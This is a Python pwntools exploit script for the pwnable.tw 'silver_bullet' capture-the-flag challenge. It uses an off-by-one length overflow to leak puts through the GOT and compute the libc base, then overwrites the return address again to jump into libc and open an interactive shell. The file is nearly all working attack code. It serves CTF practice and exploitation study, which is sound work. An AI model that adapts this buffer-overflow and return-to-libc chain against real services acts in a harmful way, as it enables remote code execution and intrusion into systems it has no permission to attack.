# Exploit script for pwnable.tw "silver_bullet" (pwntools).
# Updated for Python 3 pwntools: every value sent or matched on the
# socket is a bytes literal, since p32() returns bytes and str + bytes
# is a TypeError under Python 3.
from pwn import *

s = remote("chall.pwnable.tw", 10103)
e = ELF("./silver_bullet")
libc = ELF("./libc_32.so.6")
context.log_level = 'debug'

pr = 0x08048475  # pop; ret gadget used to clean one argument off the stack

# Stage 1: build a bullet, overflow it, and leak puts@libc via the PLT.
s.recvuntil(b":")
s.sendline(b"1")            # menu 1: create bullet
s.recvuntil(b":")
s.sendline(b"A" * 47)       # fill the description buffer to its limit
s.recvuntil(b"choice :")
s.sendline(b"2")            # menu 2: power up (append to the bullet)
s.recvuntil(b":")
s.send(b"a")                # one more byte pushes the length past its field
s.recvuntil(b"choice :")
s.sendline(b"2")            # second power up now writes over the saved return address
s.recvuntil(b":")
payload = b"\xff" * 7       # padding up to the saved return address
payload += p32(e.plt['puts'])   # return into puts@plt
payload += p32(pr)              # pop the argument, then return again
payload += p32(e.got['puts'])   # argument: puts@got, so puts prints its own libc address
payload += p32(0x08048954)      # after the leak, return here to restart the game loop
s.sendline(payload)
s.recvuntil(b"choice :")
s.sendline(b"3")            # menu 3: beat the werewolf, which triggers the return
s.recvuntil(b"!!\n")
libc_leak = u32(s.recv(4))
log.success(hex(libc_leak))
base = libc_leak - libc.symbols['puts']
log.success(hex(base))
magic = base + 0x3a819      # libc offset chosen by the author for the final return
log.success(hex(magic))

#######
# Stage 2: same overflow again, this time returning into libc at `magic`.
s.recvuntil(b":")
s.sendline(b"1")
s.recvuntil(b":")
s.sendline(b"A" * 47)
s.recvuntil(b"choice :")
s.sendline(b"2")
s.recvuntil(b":")
s.send(b"a")
s.recvuntil(b"choice :")
s.sendline(b"2")
s.recvuntil(b":")
payload = b'\xff' * 7
payload += p32(magic)
s.sendline(payload)
s.recvuntil(b"choice :")
s.sendline(b"3")
s.interactive()